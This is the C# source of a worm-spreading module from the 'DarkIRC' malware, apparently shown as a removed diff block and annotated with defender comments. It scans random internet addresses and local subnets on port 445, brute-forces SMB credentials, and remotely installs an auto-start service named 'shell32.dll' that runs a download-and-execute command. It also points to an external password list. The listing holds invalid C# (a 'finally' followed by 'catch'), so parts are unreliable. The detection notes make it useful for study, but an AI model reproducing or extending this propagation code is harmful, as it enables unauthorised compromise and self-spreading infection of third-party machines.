- using System;
- using System.Collections.Generic;
- using System.Diagnostics;
- using System.IO;
- using System.Linq;
- using System.Net;
- using System.Net.Sockets;
- using System.Runtime.InteropServices;
- using System.Security.Cryptography;
- using System.Text;
- using System.Threading;
- namespace DarkIRC
- {
- class SMB // SMB propagation component: finds hosts that answer on TCP 445 and, for each one, runs user/password attempts that ask the remote Service Control Manager (SCM) to create an auto-start service.
- { // Defender view: the artefacts to hunt for are a service named "shell32.dll" whose image path is a CMD.exe /C command line, and a single host fanning out to port 445 on many addresses.
- public static string dlexe = IRC.dlexecmd; // command text appended to "CMD.exe /C " in TestPW; IRC.dlexecmd is defined outside this listing
- public static int bruteSubThreads = 64; // size of the thread batch used by SMBHaxx
- // The users/passwords arrays read by SMBHaxx are not in this listing; the author says the password list can be viewed in this paste https://pastebin.com/6jiaGSNz
- public static void TestPW(string ip, string user, string passwd) // One attempt against one host: open the remote SCM, then try to create a service. Returns nothing and reports no result to the caller.
- { // ip: target host. user/passwd: forwarded as the last two arguments of NativeMethods.CreateService (a wrapper not shown here; presumably it mirrors Win32 CreateService - confirm).
- ip = "\\" + ip; // builds the machine-name argument handed to OpenSCManager
- try
- {
- using (var scmHandle = NativeMethods.OpenSCManager(ip, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE)) // asks the remote SCM for the create-service right only
- {
- if (scmHandle.IsInvalid)
- {
- return; // SCM could not be opened: give up silently
- }
- using ( // On the target, a service creation is normally recorded as System log event 7045 and, when audited, Security event 4697.
- var serviceHandle = NativeMethods.CreateService(
- scmHandle,
- "shell32.dll", // first string argument (presumably the service name): imitates a system DLL name, which makes it a usable indicator
- "shell32.dll", // second string argument (presumably the display name): same value
- NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS,
- NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS,
- NativeMethods.SERVICE_START_TYPES.SERVICE_AUTO_START, // auto-start type: gives the entry persistence across reboots
- NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_NORMAL,
- "C:\\Windows\\System32\\CMD.exe /C " + dlexe, // image path is a shell command line rather than a service binary; alert on services whose path starts with cmd.exe /C
- null,
- IntPtr.Zero,
- null,
- user,
- passwd))
- {
- if (serviceHandle.IsInvalid)
- {
- return; // creation failed: nothing else is done
- }
- }
- }
- }
- catch // every exception is discarded, so a failed attempt leaves no trace in this process
- {
- }
- }
- public static void SMBHaxx(string ip) // Credential-guessing driver for one host: walks the users and passwords arrays (declared outside this listing) and runs TestPW on worker threads.
- { // Defender view: account lockout and non-guessable administrator passwords blunt this loop; the network signature is a burst of parallel attempts from one source against one host.
- int count = 0; // number of threads started in the current batch
- Thread[] threads = new Thread[bruteSubThreads];
- for (var u = 0; u < users.Length - 1; u++)
- {
- for (var p = 0; p < passwords.Length - 1; p++)
- {
- threads[count] = new Thread(() => TestPW(ip, users[u], passwords[p])); // one thread per attempt
- threads[count].Start();
- count++;
- if (count > bruteSubThreads) // batch boundary: wait for the started threads before continuing
- {
- for (int i = 0; i < bruteSubThreads; i++)
- {
- threads[i].Join();
- }
- count = 0;
- GC.Collect(); // forces a garbage collection after each batch
- }
- }
- }
- }
- public static void WorkGroup() // Endless scanner: each pass probes one random IPv4 and one random IPv6 address on TCP 445 and hands any responder to SMBHaxx. Never returns.
- { // Defender view: egress filtering of TCP 445 at the perimeter stops this path; in flow logs it appears as short-lived connection attempts to port 445 on unrelated addresses.
- while (true)
- {
- using (TcpClient tcpClient = new TcpClient()) // not referenced again in the visible code
- {
- try //scan an ipv4 address
- {
- var data = new byte[4];
- new Random().NextBytes(data);
- while (data[0] == 192 || data[0] == 10 || data[0] == 127 || data[0] == 169 || data[0] == 172) // re-roll while the first octet is 192, 10, 127, 169 or 172
- {
- new Random().NextBytes(data);
- }
- IPAddress ip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- // Start an asynchronous connect; the wait below is 1000 ms (this comment previously said 5 seconds)
- IAsyncResult result = socket.BeginConnect(ip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true); // the wait result is stored, but the branch below tests socket.Connected
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(ip.ToString()); // port 445 answered: start the credential attempts
- }
- else
- {
- socket.Close();
- }
- }
- catch (Exception) // errors from the IPv4 probe are discarded
- {
- }
- try //scan an ipv6 address
- {
- var data = new byte[16]; // 16 random bytes used as an IPv6 address, with no range exclusions
- new Random().NextBytes(data);
- IPAddress ip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetworkV6, SocketType.Stream, ProtocolType.Tcp);
- IAsyncResult result = socket.BeginConnect(ip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true); // same 1000 ms wait as the IPv4 probe
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(ip.ToString());
- }
- else
- {
- socket.Close();
- }
- }
- catch (Exception) // errors from the IPv6 probe are discarded
- {
- }
- }
- }
- }
- public static void internalNetwork() // Local-network sweep: for each IPv4 address of this host, builds candidate addresses, probes TCP 445 on each and passes responders to SMBHaxx.
- { // Defender view: this is east-west traffic - a workstation touching port 445 on many internal addresses in sequence; host firewalls and blocking workstation-to-workstation SMB limit its reach.
- try
- {
- var host = Dns.GetHostEntry(Dns.GetHostName()); // addresses of the local machine
- foreach (var ip in host.AddressList)
- {
- if (ip.AddressFamily == AddressFamily.InterNetwork) // IPv4 addresses only
- {
- string subnet = String.Join(".", ip.ToString().Split(".".ToCharArray()[0]).Skip(2)); // two dot-separated fields taken from the local address
- for (int i = 0; i < 255; i++) // third byte: 0..254
- {
- for (var ii = 1; ii < 254; ii++) // fourth byte: 1..253
- {
- byte[] data = new byte[4] { Convert.ToByte(int.Parse(subnet.Split(".".ToCharArray()[0])[0])), Convert.ToByte(int.Parse(subnet.Split(".".ToCharArray()[0])[1])), Convert.ToByte(i), Convert.ToByte(ii) }; // candidate = the two fields of subnet, then i, then ii
- IPAddress thisip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- // Start an asynchronous connect; the wait below is 1000 ms (this comment previously said 5 seconds)
- IAsyncResult result = socket.BeginConnect(thisip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true);
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(thisip.ToString()); // port 445 answered: start the credential attempts
- }
- else
- {
- socket.Close();
- }
- }
- }
- }
- }
- }
- finally
- {
- }
- catch { }
- }
- }
- }